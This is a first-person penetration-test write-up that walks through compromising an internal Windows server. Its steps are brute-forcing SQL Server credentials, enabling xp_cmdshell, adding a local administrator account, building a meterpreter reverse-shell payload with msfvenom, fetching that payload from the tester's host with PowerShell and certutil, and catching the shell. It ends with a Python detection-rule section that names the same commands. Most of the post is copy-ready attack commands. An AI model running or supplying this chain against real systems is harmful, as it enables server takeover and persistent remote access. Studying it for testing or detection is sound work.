0x00 Foreword
During a recent penetration test of a customer's internal network servers, I found a large number of weak passwords; this write-up starts from there.
0x01 Weak passwords
Port scan of the target IP: open ports 80, 445, 1433, 3389
- Accessed port 80, only a "successful installation" page. Scanned directories for any source code disclosure, nothing found.
- Ran the nmap port scan scripts against 445 to see whether MS17-010 or other vulnerabilities exist, nothing found.
- Brute-forced 1433 with the "super weak password" tool; the blast succeeded, account/password: SA / SA
- Brute-forced 3389 at the same time, nothing found.
So that is the breakthrough: connected to the SQL Server database successfully with Navicat.
0x02 Connecting to 3389
Looked around a bit, no data, so I tried to take the server itself: opened a New Query directly and enabled xp_cmdshell:
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE;
Then executed a command:
exec master..xp_cmdshell "whoami";
It is SYSTEM privileges, just as imagined.
3389 is open, so it is easier to add a user and connect directly over Remote Desktop.
Strengthened the password and added the user again:
exec master..xp_cmdshell "net user test paperpen123. /add"; exec master..xp_cmdshell "net localgroup administrators test /add";
Everything went smoothly; started connecting to 3389, but unfortunately...
It is Win7, which only allows a single user to log in; if he noticed he had been kicked off, I could not keep playing, so I gave up on connecting to 3389.
0x03 Downloading the Trojan with PowerShell
I would still rather pop a shell back to my local machine, easier to operate. Easy to say, but how to pop it?
It should be emphasized that this network cannot reach the Internet, so commands that fetch a tool from the external network cannot be used.
What can be done is to have it download the tool from my local server onto its server.
But the firewall on my machine has to be turned off; I only thought of that after the access attempt failed. My IP is 195.1.7.23
Generate an exe Trojan with Kali:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=195.1.7.23 LPORT=8888 -f exe > shell.exe
Quickly set up a local environment with phpStudy,
put shell.exe into the web root; the link is http://195.1.7.23/shell.exe
Listen on local port 8888:
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 195.1.7.23
LHOST => 195.1.7.23
msf5 exploit(multi/handler) > set LPORT 8888
LPORT => 8888
msf5 exploit(multi/handler) > exploit
Everything is ready; now get the server to download and execute shell.exe. Most of the following commands were provided by my friend Calendula, thanks to him.
Already tested that PowerShell commands execute, so ran my friend Calendula's download command:
exec master..xp_cmdshell "powershell $client = new-object System.Net.WebClient"; exec master..xp_cmdshell "powershell $client.DownloadFile('http://195.1.7.23/shell.exe', 'shell.exe')";
These two could be merged into a single execution, but earlier attempts at other commands had run into a command length limit,
so they were executed separately; unfortunately...
DownloadFile was unavailable, for reasons I did not understand, so this method was abandoned.
0x04 Downloading with certutil
My friend Calendula offered a new idea: use certutil.exe. I was stunned, never heard of it. The command is as follows:
exec master..xp_cmdshell 'certutil.exe -urlcache -split -f "http://195.1.7.23/shell.exe"';
Checked with dir: the download to the server had succeeded.
0x05 Shell comes online
One step away. Entered the following command and nervously clicked execute:
exec master..xp_cmdshell 'shell.exe';
Stuck... executed again, stuck again, executed once more, what?
Went back to the listener screen, pressed Ctrl+C and started the listener again, and the result dropped into the meterpreter prompt. So that was why it was "stuck".
Excitedly took a screenshot.
Had a quick look: not a domain environment.
Yes, it seems there is still a long way to go.
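From the defender's side, the chain above (sqlservr.exe spawning cmd.exe through xp_cmdshell, a local account pushed into administrators, certutil or PowerShell fetching an executable) stands out clearly in endpoint process-creation logs. The following is an added example, not code from the original post: a small Python rule set run over constructed sample events whose command lines mirror the ones in the post; the event fields, rule names and regexes are my own assumptions.

```python
import re

# Constructed sample events shaped like endpoint process-creation records
# (parent image, image, command line); not real logs, the command lines mirror the post.
SAMPLE_EVENTS = [
    {"parent": r"C:\Program Files\Microsoft SQL Server\MSSQL\Binn\sqlservr.exe",
     "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c whoami"},
    {"parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\net.exe",
     "cmdline": "net localgroup administrators test /add"},
    {"parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": 'certutil.exe -urlcache -split -f "http://195.1.7.23/shell.exe"'},
    {"parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell $client.DownloadFile('http://195.1.7.23/shell.exe', 'shell.exe')"},
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil.exe -verify cert.cer"},  # benign use, must not alert
]

# (rule name, image basename, regex over the command line, required parent basename or None)
RULES = [
    ("sqlserver_spawned_shell", "cmd.exe", r".", "sqlservr.exe"),
    ("certutil_url_download", "certutil.exe", r"-urlcache\b.*-f\s+\"?https?://", None),
    ("powershell_webclient_download", "powershell.exe", r"(?i)webclient|downloadfile|downloadstring", None),
    ("account_or_admin_group_add", "net.exe", r"(?i)\b(user|localgroup\s+administrators)\b.*\s/add\b", None),
]

def basename(path):
    # Last component of a Windows path, lower-cased, so full paths and bare names compare equal.
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def match_event(event):
    # Names of every rule that fires on one process-creation event.
    hits = []
    for name, image, pattern, parent in RULES:
        if basename(event["image"]) != image or (parent and basename(event["parent"]) != parent):
            continue
        if re.search(pattern, event["cmdline"]):
            hits.append(name)
    return hits

def scan(events):
    # Map event index -> rule names, for events that triggered at least one rule.
    return {i: hits for i, e in enumerate(events) if (hits := match_event(e))}

def full_chain_seen(events):
    # True when the post's whole sequence is present: a shell spawned by SQL Server,
    # a download through a built-in binary, and a privileged account change.
    fired = {name for hits in scan(events).values() for name in hits}
    return bool("sqlserver_spawned_shell" in fired
                and fired & {"certutil_url_download", "powershell_webclient_download"}
                and "account_or_admin_group_add" in fired)
```

Any single rule firing is worth a look; all three stages on one host within minutes is the pattern described in this post and should page someone.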
0x06 Conclusion
That is all for now; if there is progress, it will be updated. All the masters are welcome to leave a message, exchange ideas, learn from each other and make progress together.